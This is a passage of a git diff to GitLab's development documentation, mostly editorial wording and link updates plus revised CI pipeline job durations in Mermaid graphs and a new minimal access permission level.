tokens](../api/index.md#gitlab-cicd-job-token) have to be supported at some point in the future. - **Requests**: Which requests are needed to have a working MVC. Ideally, produce a list of all the requests needed for the MVC (including required actions). Further @@ -191,7 +191,7 @@ against the project or group before continuing. The current database model allows you to store a name and a version for each package. Every time you upload a new package, you can either create a new record of `Package` or add files to existing record. `PackageFile` should be able to store all file-related -information like the file `name`, `side`, `sha1`, etc. +information like the file `name`, `side`, `sha1`, and so on. If there is specific data necessary to be stored for only one package system support, consider creating a separate metadata model. See `packages_maven_metadata` table diff --git a/doc/development/performance.md b/doc/development/performance.md index 84b3a8f1092..e59f7fb154b 100644 --- a/doc/development/performance.md +++ b/doc/development/performance.md @@ -120,7 +120,7 @@ allowing you to profile which code is running on CPU in detail. It's important to note that profiling an application *alters its performance*. Different profiling strategies have different overheads. Stackprof is a sampling profiler. It samples stack traces from running threads at a configurable -frequency (e.g. 100hz, that is 100 stacks per second). This type of profiling +frequency (for example, 100hz, that is 100 stacks per second). This type of profiling has quite a low (albeit non-zero) overhead and is generally considered to be safe for production. diff --git a/doc/development/permissions.md b/doc/development/permissions.md index 8c3600a30ba..177fedcf454 100644 --- a/doc/development/permissions.md +++ b/doc/development/permissions.md @@ -57,9 +57,12 @@ can be accessed only by project members by default. ### Members Users can be members of multiple groups and projects. The following access -levels are available (defined in the `Gitlab::Access` module): +levels are available (defined in the +[`Gitlab::Access`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/access.rb) +module): - No access (`0`) +- [Minimal access](../user/permissions.md#users-with-minimal-access) (`5`) - Guest (`10`) - Reporter (`20`) - Developer (`30`) diff --git a/doc/development/pipelines.md b/doc/development/pipelines.md index 0dc1481f542..0fe48fe8b9e 100644 --- a/doc/development/pipelines.md +++ b/doc/development/pipelines.md @@ -14,12 +14,12 @@ which itself includes files under for easier maintenance. We're striving to [dogfood](https://about.gitlab.com/handbook/engineering/#dogfooding) -GitLab [CI/CD features and best-practices](../ci/yaml/README.md) +GitLab [CI/CD features and best-practices](../ci/yaml/index.md) as much as possible. ## Overview -Pipelines for the GitLab project are created using the [`workflow:rules` keyword](../ci/yaml/README.md#workflow) +Pipelines for the GitLab project are created using the [`workflow:rules` keyword](../ci/yaml/index.md#workflow) feature of the GitLab CI/CD. Pipelines are always created for the following scenarios: @@ -49,9 +49,9 @@ depending on the changes made in the MR: - [Frontend-only MR pipeline](#frontend-only-mr-pipeline): This is typically created for an MR that only changes frontend code. - [QA-only MR pipeline](#qa-only-mr-pipeline): This is typically created for an MR that only changes end to end tests related code. -We use the [`rules:`](../ci/yaml/README.md#rules) and [`needs:`](../ci/yaml/README.md#needs) keywords extensively +We use the [`rules:`](../ci/yaml/index.md#rules) and [`needs:`](../ci/yaml/index.md#needs) keywords extensively to determine the jobs that need to be run in a pipeline. Note that an MR that includes multiple types of changes would -have a pipelines that include jobs from multiple types (e.g. a combination of docs-only and code-only pipelines). +have a pipelines that include jobs from multiple types (for example, a combination of docs-only and code-only pipelines). #### Documentation only MR pipeline @@ -82,17 +82,17 @@ graph RL; subgraph "No needed jobs"; 1-1["danger-review (2.3 minutes)"]; click 1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8100542&udv=0" - 1-2["build-qa-image (1.6 minutes)"]; + 1-2["build-qa-image (2 minutes)"]; click 1-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914325&udv=0" - 1-3["compile-test-assets (7 minutes)"]; + 1-3["compile-test-assets (6 minutes)"]; click 1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914317&udv=0" 1-4["compile-test-assets as-if-foss (7 minutes)"]; click 1-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356616&udv=0" - 1-5["compile-production-assets (19 minutes)"]; + 1-5["compile-production-assets (14 minutes)"]; click 1-5 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914312&udv=0" - 1-6["setup-test-env (9 minutes)"]; + 1-6["setup-test-env (4 minutes)"]; click 1-6 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914315&udv=0" - 1-7["review-stop-failed-deployment"]; + 1-7["review-delete-deployment"]; 1-8["dependency_scanning"]; 1-9["qa:internal, qa:internal-as-if-foss"]; 1-11["qa:selectors, qa:selectors-as-if-foss"]; @@ -111,24 +111,24 @@ graph RL; class 1-6 criticalPath; end - 2_1-1["graphql-verify (4 minutes)"]; + 2_1-1["graphql-verify (2.3 minutes)"]; click 2_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356715&udv=0" 2_1-2["memory-static (4.75 minutes)"]; click 2_1-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356721&udv=0" - 2_1-3["run-dev-fixtures (6 minutes)"]; + 2_1-3["run-dev-fixtures (3 minutes)"]; click 2_1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356729&udv=0" - 2_1-4["run-dev-fixtures-ee (6.75 minutes)"]; + 2_1-4["run-dev-fixtures-ee (4 minutes)"]; click 2_1-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356731&udv=0" subgraph "Needs `setup-test-env`"; 2_1-1 & 2_1-2 & 2_1-3 & 2_1-4 --> 1-6; end - 2_2-2["rspec frontend_fixture/rspec-ee frontend_fixture (12 minutes)"]; + 2_2-2["rspec frontend_fixture/rspec-ee frontend_fixture (11 minutes)"]; class 2_2-2 criticalPath; click 2_2-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=7910143&udv=0" - 2_2-4["memory-on-boot (6 minutes)"]; + 2_2-4["memory-on-boot (3.5 minutes)"]; click 2_2-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356727&udv=0" - 2_2-5["webpack-dev-server (4.5 minutes)"]; + 2_2-5["webpack-dev-server (4 minutes)"]; click 2_2-5 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8404303&udv=0" subgraph "Needs `setup-test-env` & `compile-test-assets`"; 2_2-2 & 2_2-4 & 2_2-5 --> 1-6 & 1-3; @@ -152,22 +152,22 @@ graph RL; click 2_5-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations" end - 3_1-1["jest (15 minutes)"]; + 3_1-1["jest (16 minutes)"]; class 3_1-1 criticalPath; click 3_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914204&udv=0" - 3_1-2["karma (4 minutes)"]; + 3_1-2["karma (2 minutes)"]; click 3_1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914200&udv=0" subgraph "Needs `rspec frontend_fixture/rspec-ee frontend_fixture`"; 3_1-1 & 3_1-2 --> 2_2-2; end - 3_2-1["rspec:coverage (4.6 minutes)"]; + 3_2-1["rspec:coverage (5.3 minutes)"]; subgraph "Depends on `rspec` jobs"; 3_2-1 -.->|"(don't use needs because of limitations)"| 2_5-1; click 3_2-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=7248745&udv=0" end - 4_1-1["coverage-frontend (2.75 minutes)"]; + 4_1-1["coverage-frontend (2 minutes)"]; subgraph "Needs `jest`"; 4_1-1 --> 3_1-1; class 4_1-1 criticalPath; @@ -186,15 +186,15 @@ graph RL; subgraph "No needed jobs"; 1-1["danger-review (2.3 minutes)"]; click 1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8100542&udv=0" - 1-2["build-qa-image (1.6 minutes)"]; + 1-2["build-qa-image (2 minutes)"]; click 1-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914325&udv=0" - 1-3["compile-test-assets (7 minutes)"]; + 1-3["compile-test-assets (6 minutes)"]; click 1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914317&udv=0" 1-4["compile-test-assets as-if-foss (7 minutes)"]; click 1-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356616&udv=0" - 1-5["compile-production-assets (19 minutes)"]; + 1-5["compile-production-assets (14 minutes)"]; click 1-5 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914312&udv=0" - 1-6["setup-test-env (9 minutes)"]; + 1-6["setup-test-env (4 minutes)"]; click 1-6 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914315&udv=0" 1-7["review-stop-failed-deployment"]; 1-8["dependency_scanning"]; @@ -216,24 +216,24 @@ graph RL; class 1-6 criticalPath; end - 2_1-1["graphql-verify (4 minutes)"]; + 2_1-1["graphql-verify (2.3 minutes)"]; click 2_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356715&udv=0" 2_1-2["memory-static (4.75 minutes)"]; click 2_1-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356721&udv=0" - 2_1-3["run-dev-fixtures (6 minutes)"]; + 2_1-3["run-dev-fixtures (3 minutes)"]; click 2_1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356729&udv=0" - 2_1-4["run-dev-fixtures-ee (6.75 minutes)"]; + 2_1-4["run-dev-fixtures-ee (4 minutes)"]; click 2_1-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356731&udv=0" subgraph "Needs `setup-test-env`"; 2_1-1 & 2_1-2 & 2_1-3 & 2_1-4 --> 1-6; end - 2_2-2["rspec frontend_fixture/rspec-ee frontend_fixture (12 minutes)"]; + 2_2-2["rspec frontend_fixture/rspec-ee frontend_fixture (11 minutes)"]; class 2_2-2 criticalPath; click 2_2-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=7910143&udv=0" - 2_2-4["memory-on-boot (6 minutes)"]; + 2_2-4["memory-on-boot (3.5 minutes)"]; click 2_2-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356727&udv=0" - 2_2-5["webpack-dev-server (4.5 minutes)"]; + 2_2-5["webpack-dev-server (4 minutes)"]; click 2_2-5 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8404303&udv=0" subgraph "Needs `setup-test-env` & `compile-test-assets`"; 2_2-2 & 2_2-4 & 2_2-5 --> 1-6 & 1-3; @@ -258,51 +258,48 @@ graph RL; click 2_5-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations" end - 2_6-1["review-build-cng (27.3 minutes)"]; + 2_6-1["review-build-cng (27 minutes)"]; subgraph "Needs `build-assets-image`"; 2_6-1 --> 2_3-1; class 2_6-1 criticalPath; click 2_6-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914314&udv=0" end - 3_1-1["jest (15 minutes)"]; + 3_1-1["jest (16 minutes)"]; class 3_1-1 criticalPath; click 3_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914204&udv=0" - 3_1-2["karma (4 minutes)"]; + 3_1-2["karma (2 minutes)"]; click 3_1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914200&udv=0" subgraph "Needs `rspec frontend_fixture/rspec-ee frontend_fixture`"; 3_1-1 & 3_1-2 --> 2_2-2; end - 3_2-1["rspec:coverage (4.6 minutes)"]; + 3_2-1["rspec:coverage (5.3 minutes)"]; subgraph "Depends on `rspec` jobs"; 3_2-1 -.->|"(don't use needs because of limitations)"| 2_5-1; click 3_2-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=7248745&udv=0" end - 4_1-1["coverage-frontend (2.75 minutes)"]; + 4_1-1["coverage-frontend (2 minutes)"]; subgraph "Needs `jest`"; 4_1-1 --> 3_1-1; class 4_1-1 criticalPath; click 4_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=7910777&udv=0" end - 3_3-1["review-deploy (6 minutes)"]; + 3_3-1["review-deploy (10.5 minutes)"]; subgraph "Played by `review-build-cng`"; 3_3-1 --> 2_6-1; class 3_3-1 criticalPath; click 3_3-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6721130&udv=0" end - 4_2-1["review-qa-smoke (8 minutes)"]; + 4_2-1["review-qa-smoke (7.4 minutes)"]; click 4_2-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6729805&udv=0" - 4_2-2["review-performance (4 minutes)"]; + 4_2-2["review-performance (2.5 minutes)"]; click 4_2-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356817&udv=0" - 4_2-3["dast (18 minutes)"]; - click 4_2-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356819&udv=0" - class 4_2-3 criticalPath; subgraph "Played by `review-deploy`"; - 4_2-1 & 4_2-2 & 4_2-3 -.->|"(don't use needs because of limitations)"| 3_3-1; + 4_2-1 & 4_2-2 --> 3_3-1; end ``` @@ -317,15 +314,15 @@ graph RL; subgraph "No needed jobs"; 1-1["danger-review (2.3 minutes)"]; click 1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8100542&udv=0" - 1-2["build-qa-image (1.6 minutes)"]; + 1-2["build-qa-image (2 minutes)"]; click 1-2 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914325&udv=0" - 1-3["compile-test-assets (7 minutes)"]; + 1-3["compile-test-assets (6 minutes)"]; click 1-3 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914317&udv=0" 1-4["compile-test-assets as-if-foss (7 minutes)"]; click 1-4 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356616&udv=0" - 1-5["compile-production-assets (19 minutes)"]; + 1-5["compile-production-assets (14 minutes)"]; click 1-5 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914312&udv=0" - 1-6["setup-test-env (9 minutes)"]; + 1-6["setup-test-env (4 minutes)"]; click 1-6 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=6914315&udv=0" 1-7["review-stop-failed-deployment"]; 1-8["dependency_scanning"]; @@ -345,7 +342,7 @@ graph RL; class 1-5 criticalPath; end - 2_1-1["graphql-verify (4 minutes)"]; + 2_1-1["graphql-verify (2.3 minutes)"]; click 2_1-1 "https://app.periscopedata.com/app/gitlab/652085/Engineering-Productivity---Pipeline-Build-Durations?widget=8356715&udv=0" subgraph "Needs `setup-test-env`"; 2_1-1 --> 1-6; @@ -357,7 +354,7 @@ graph RL; class 2_3-1 criticalPath; end - 2_4-1["package-and-qa (105 minutes)"]; + 2_4-1["package-and-qa (140 minutes)"]; subgraph "Needs `build-qa-image` & `build-assets-image`"; 2_4-1 --> 1-2 & 2_3-1; class 2_4-1 criticalPath; @@ -537,7 +534,7 @@ the `gitlab-org/gitlab-foss` project. ### Interruptible pipelines -By default, all jobs are [interruptible](../ci/yaml/README.md#interruptible), except the +By default, all jobs are [interruptible](../ci/yaml/index.md#interruptible), except the `dont-interrupt-me` job which runs automatically on `main`, and is `manual` otherwise. @@ -559,8 +556,8 @@ request, be sure to start the `dont-interrupt-me` job before pushing. - `.qa-cache` - `.yarn-cache` - `.assets-compile-cache` (the key includes `${NODE_ENV}` so it's actually two different caches). -1. These cache definitions are composed of [multiple atomic caches](../ci/yaml/README.md#multiple-caches). -1. Only 6 specific jobs, running in 2-hourly scheduled pipelines, are pushing (i.e. updating) to the caches: +1. These cache definitions are composed of [multiple atomic caches](../ci/caching/index.md#use-multiple-caches). +1. Only the following jobs, running in 2-hourly scheduled pipelines, are pushing (that is, updating) to the caches: - `update-setup-test-env-cache`, defined in [`.gitlab/ci/rails.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/rails.gitlab-ci.yml). - `update-gitaly-binaries-cache`, defined in [`.gitlab/ci/rails.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/rails.gitlab-ci.yml). - `update-static-analysis-cache`, defined in [`.gitlab/ci/rails.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/rails.gitlab-ci.yml). @@ -568,6 +565,7 @@ request, be sure to start the `dont-interrupt-me` job before pushing. - `update-assets-compile-production-cache`, defined in [`.gitlab/ci/frontend.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/frontend.gitlab-ci.yml). - `update-assets-compile-test-cache`, defined in [`.gitlab/ci/frontend.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/frontend.gitlab-ci.yml). - `update-yarn-cache`, defined in [`.gitlab/ci/frontend.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/frontend.gitlab-ci.yml). + - `update-storybook-yarn-cache`, defined in [`.gitlab/ci/frontend.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/frontend.gitlab-ci.yml). 1. These jobs can also be forced to run in merge requests whose title include `UPDATE CACHE` (this can be useful to warm the caches in a MR that updates the cache keys). ### Artifacts strategy @@ -584,7 +582,7 @@ several reasons: - It significantly reduces load on the file server, as smaller deltas mean less time spent in `git pack-objects`. The pre-clone step works by using the `CI_PRE_CLONE_SCRIPT` variable -[defined by GitLab.com shared runners](../ci/runners/README.md#pre-clone-script). +[defined by GitLab.com shared runners](../ci/runners/build_cloud/linux_build_cloud.md#pre-clone-script). The `CI_PRE_CLONE_SCRIPT` is currently defined as a project CI/CD variable: @@ -655,7 +653,7 @@ The current stages are: - `fixtures`: This stage includes jobs that prepare fixtures needed by frontend tests. - `test`: This stage includes most of the tests, DB/migration jobs, and static analysis jobs. - `post-test`: This stage includes jobs that build reports or gather data from - the `test` stage's jobs (e.g. coverage, Knapsack metadata etc.). + the `test` stage's jobs (for example, coverage, Knapsack metadata, and so on). - `review-prepare`: This stage includes a job that build the CNG images that are later used by the (Helm) Review App deployment (see [Review Apps](testing_guide/review_apps.md) for details). @@ -665,9 +663,9 @@ that is deployed in stage `review`. - `qa`: This stage includes jobs that perform QA tasks against the Review App that is deployed in stage `review`. - `post-qa`: This stage includes jobs that build reports or gather data from - the `qa` stage's jobs (e.g. Review App performance report). + the `qa` stage's jobs (for example, Review App performance report). - `pages`: This stage includes a job that deploys the various reports as - GitLab Pages (e.g. [`coverage-ruby`](https://gitlab-org.gitlab.io/gitlab/coverage-ruby/), + GitLab Pages (for example, [`coverage-ruby`](https://gitlab-org.gitlab.io/gitlab/coverage-ruby/), [`coverage-javascript`](https://gitlab-org.gitlab.io/gitlab/coverage-javascript/), and `webpack-report` (found at `https://gitlab-org.gitlab.io/gitlab/webpack-report/`, but there is [an issue with the deployment](https://gitlab.com/gitlab-org/gitlab/-/issues/233458)). @@ -716,14 +714,14 @@ each pipeline includes default variables defined in ### Common job definitions -Most of the jobs [extend from a few CI definitions](../ci/yaml/README.md#extends) +Most of the jobs [extend from a few CI definitions](../ci/yaml/index.md#extends) defined in [`.gitlab/ci/global.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/global.gitlab-ci.yml) -that are scoped to a single [configuration keyword](../ci/yaml/README.md#job-keywords). +that are scoped to a single [configuration keyword](../ci/yaml/index.md#job-keywords). | Job definitions | Description | |------------------|-------------| -| `.default-retry` | Allows a job to [retry](../ci/yaml/README.md#retry) upon `unknown_failure`, `api_failure`, `runner_system_failure`, `job_execution_timeout`, or `stuck_or_timeout_failure`. | -| `.default-before_script` | Allows a job to use a default `before_script` definition suitable for Ruby/Rails tasks that may need a database running (e.g. tests). | +| `.default-retry` | Allows a job to [retry](../ci/yaml/index.md#retry) upon `unknown_failure`, `api_failure`, `runner_system_failure`, `job_execution_timeout`, or `stuck_or_timeout_failure`. | +| `.default-before_script` | Allows a job to use a default `before_script` definition suitable for Ruby/Rails tasks that may need a database running (for example, tests). | | `.setup-test-env-cache` | Allows a job to use a default `cache` definition suitable for setting up test environment for subsequent Ruby/Rails tasks. | | `.rails-cache` | Allows a job to use a default `cache` definition suitable for Ruby/Rails tasks. | | `.static-analysis-cache` | Allows a job to use a default `cache` definition suitable for static analysis tasks. | @@ -741,16 +739,16 @@ that are scoped to a single [configuration keyword](../ci/yaml/README.md#job-key ### `rules`, `if:` conditions and `changes:` patterns -We're using the [`rules` keyword](../ci/yaml/README.md#rules) extensively. +We're using the [`rules` keyword](../ci/yaml/index.md#rules) extensively. All `rules` definitions are defined in [`rules.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/rules.gitlab-ci.yml), -then included in individual jobs via [`extends`](../ci/yaml/README.md#extends). +then included in individual jobs via [`extends`](../ci/yaml/index.md#extends). The `rules` definitions are composed of `if:` conditions and `changes:` patterns, which are also defined in [`rules.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/rules.gitlab-ci.yml) -and included in `rules` definitions via [YAML anchors](../ci/yaml/README.md#anchors) +and included in `rules` definitions via [YAML anchors](../ci/yaml/index.md#anchors) #### `if:` conditions @@ -759,8 +757,8 @@ and included in `rules` definitions via [YAML anchors](../ci/yaml/README.md#anch | `if:` conditions | Description | Notes | |------------------|-------------|-------| | `if-not-canonical-namespace` | Matches if the project isn't in the canonical (`gitlab-org/`) or security (`gitlab-org/security`) namespace. | Use to create a job for forks (by using `when: on_success|manual`), or **not** create a job for forks (by using `when: never`). | -| `if-not-ee` | Matches if the project isn't EE (i.e. project name isn't `gitlab` or `gitlab-ee`). | Use to create a job only in the FOSS project (by using `when: on_success|manual`), or **not** create a job if the project is EE (by using `when: never`). | -| `if-not-foss` | Matches if the project isn't FOSS (i.e. project name isn't `gitlab-foss`, `gitlab-ce`, or `gitlabhq`). | Use to create a job only in the EE project (by using `when: on_success|manual`), or **not** create a job if the project is FOSS (by using `when: never`). | +| `if-not-ee` | Matches if the project isn't EE (that is, project name isn't `gitlab` or `gitlab-ee`). | Use to create a job only in the FOSS project (by using `when: on_success|manual`), or **not** create a job if the project is EE (by using `when: never`). | +| `if-not-foss` | Matches if the project isn't FOSS (that is, project name isn't `gitlab-foss`, `gitlab-ce`, or `gitlabhq`). | Use to create a job only in the EE project (by using `when: on_success|manual`), or **not** create a job if the project is FOSS (by using `when: never`). | | `if-default-refs` | Matches if the pipeline is for `master`, `main`, `/^[\d-]+-stable(-ee)?$/` (stable branches), `/^\d+-\d+-auto-deploy-\d+$/` (auto-deploy branches), `/^security\//` (security branches), merge requests, and tags. | Note that jobs aren't created for branches with this default configuration. | | `if-master-refs` | Matches if the current branch is `master` or `main`. | | | `if-master-push` | Matches if the current branch is `master` or `main` and pipeline source is `push`. | | @@ -799,11 +797,11 @@ and included in `rules` definitions via [YAML anchors](../ci/yaml/README.md#anch | `ci-qa-patterns` | Only create job for CI configuration-related changes related to the `qa` stage. | | `yaml-lint-patterns` | Only create job for YAML-related changes. | | `docs-patterns` | Only create job for docs-related changes. | -| `frontend-dependency-patterns` | Only create job when frontend dependencies are updated (i.e. `package.json`, and `yarn.lock`). changes. | +| `frontend-dependency-patterns` | Only create job when frontend dependencies are updated (that is, `package.json`, and `yarn.lock`). changes. | | `frontend-patterns` | Only create job for frontend-related changes. | | `backend-patterns` | Only create job for backend-related changes. | | `db-patterns` | Only create job for DB-related changes. | -| `backstage-patterns` | Only create job for backstage-related changes (i.e. Danger, fixtures, RuboCop, specs). | +| `backstage-patterns` | Only create job for backstage-related changes (that is, Danger, fixtures, RuboCop, specs). | | `code-patterns` | Only create job for code-related changes. | | `qa-patterns` | Only create job for QA-related changes. | | `code-backstage-patterns` | Combination of `code-patterns` and `backstage-patterns`. | @@ -812,4 +810,4 @@ and included in `rules` definitions via [YAML anchors](../ci/yaml/README.md#anch --- -[Return to Development documentation](README.md) +[Return to Development documentation](index.md) diff --git a/doc/development/policies.md b/doc/development/policies.md index 315878e19d9..8ad3d3f42ba 100644 --- a/doc/development/policies.md +++ b/doc/development/policies.md @@ -106,7 +106,7 @@ Each line represents a rule that was evaluated. There are a few things to note: 1. The `-` or `+` symbol indicates whether the rule block was evaluated to be `false` or `true`, respectively. 1. The number inside the brackets indicates the score. -1. The last part of the line (e.g. `@john : Issue/1`) shows the username +1. The last part of the line (for example, `@john : Issue/1`) shows the username and subject for that rule. Here you can see that the first four rules were evaluated `false` for @@ -150,7 +150,7 @@ then the result of the condition is cached globally only based on the subject - **DANGER**: If you use a `:scope` option when the condition actually uses data from both user and subject (including a simple anonymous check!) your result is cached at too global of a scope and results in cache bugs. -Sometimes we are checking permissions for a lot of users for one subject, or a lot of subjects for one user. In this case, we want to set a *preferred scope* - i.e. tell the system that we prefer rules that can be cached on the repeated parameter. For example, in `Ability.users_that_can_read_project`: +Sometimes we are checking permissions for a lot of users for one subject, or a lot of subjects for one user. In this case, we want to set a *preferred scope* - that is, tell the system that we prefer rules that can be cached on the repeated parameter. For example, in `Ability.users_that_can_read_project`: ```ruby def users_that_can_read_project(users, project) diff --git a/doc/development/polymorphic_associations.md b/doc/development/polymorphic_associations.md index f341255a7e1..bbeaab40a90 100644 --- a/doc/development/polymorphic_associations.md +++ b/doc/development/polymorphic_associations.md @@ -146,7 +146,7 @@ filter rows using the `IS NULL` condition. To summarize: using separate tables allows us to use foreign keys effectively, create indexes only where necessary, conserve space, query data more -efficiently, and scale these tables more easily (e.g. by storing them on +efficiently, and scale these tables more easily (for example, by storing them on separate disks). A nice side effect of this is that code can also become easier, as a single model isn't responsible for handling different kinds of data. diff --git a/doc/development/profiling.md b/doc/development/profiling.md index 781138a6ade..a58e1d60cc5 100644 --- a/doc/development/profiling.md +++ b/doc/development/profiling.md @@ -135,7 +135,7 @@ starting GitLab. For example: ENABLE_BULLET=true bundle exec rails s ``` -Bullet logs query problems to both the Rails log as well as the Chrome +Bullet logs query problems to both the Rails log as well as the browser console. As a follow up to finding `N+1` queries with Bullet, consider writing a [QueryRecoder test](query_recorder.md) to prevent a regression. diff --git a/doc/development/pry_debugging.md b/doc/development/pry_debugging.md index 402029164a7..5481da348e8 100644 --- a/doc/development/pry_debugging.md +++ b/doc/development/pry_debugging.md @@ -129,7 +129,7 @@ end ## Repeat last command You can repeat the last command by just hitting the <kbd>Enter</kbd> -key (e.g., with `step` or`next`), if you place the following snippet +key (for example, with `step` or`next`), if you place the following snippet in your `~/.pryrc`: ```ruby diff --git a/doc/development/query_performance.md b/doc/development/query_performance.md index 3ff36c7d005..318d9f46aff 100644 --- a/doc/development/query_performance.md +++ b/doc/development/query_performance.md @@ -21,7 +21,7 @@ When you are optimizing your SQL queries, there are two dimensions to pay attent | Queries in a migration | `100ms` | This is different than the total [migration time](database_review.md#timing-guidelines-for-migrations). | | Concurrent operations in a migration | `5min` | Concurrent operations do not block the database, but they block the GitLab update. This includes operations such as `add_concurrent_index` and `add_concurrent_foreign_key`. | | Background migrations | `1s` | | -| Usage Ping | `1s` | See the [usage ping docs](usage_ping/index.md#developing-and-testing-usage-ping) for more details. | +| Service Ping | `1s` | See the [Service Ping docs](service_ping/index.md#developing-and-testing-service-ping) for more details. | - When analyzing your query's performance, pay attention to if the time you are seeing is on a [cold or warm cache](#cold-and-warm-cache). These guidelines apply for both cache types. - When working with batched queries, change the range and batch size to see how it effects the query timing and caching. diff --git a/doc/development/query_recorder.md b/doc/development/query_recorder.md index 46866f67f68..8759bd09538 100644 --- a/doc/development/query_recorder.md +++ b/doc/development/query_recorder.md @@ -48,7 +48,7 @@ end Use a [request spec](https://gitlab.com/gitlab-org/gitlab-foss/tree/master/spec/requests) when writing a N+1 test on the controller level. Controller specs should not be used to write N+1 tests as the controller is only initialized once per example. -This could lead to false successes where subsequent "requests" could have queries reduced (e.g. because of memoization). +This could lead to false successes where subsequent "requests" could have queries reduced (for example, because of memoization). ## Finding the source of the query diff --git a/doc/development/rails_initializers.md b/doc/development/rails_initializers.md index 89902c81cd5..ee73dac2b72 100644 --- a/doc/development/rails_initializers.md +++ b/doc/development/rails_initializers.md @@ -19,4 +19,4 @@ Ruby files in this folder are loaded in alphabetical order just like the default Some examples where you would need to do this are: 1. Modifying Rails' `config.autoload_paths` -1. Changing configuration that Zeitwerk uses, e.g. inflections +1. Changing configuration that Zeitwerk uses, for example, inflections diff --git a/doc/development/rake_tasks.md b/doc/development/rake_tasks.md index 8d20c2b738e..6b2b941a0c1 100644 --- a/doc/development/rake_tasks.md +++ 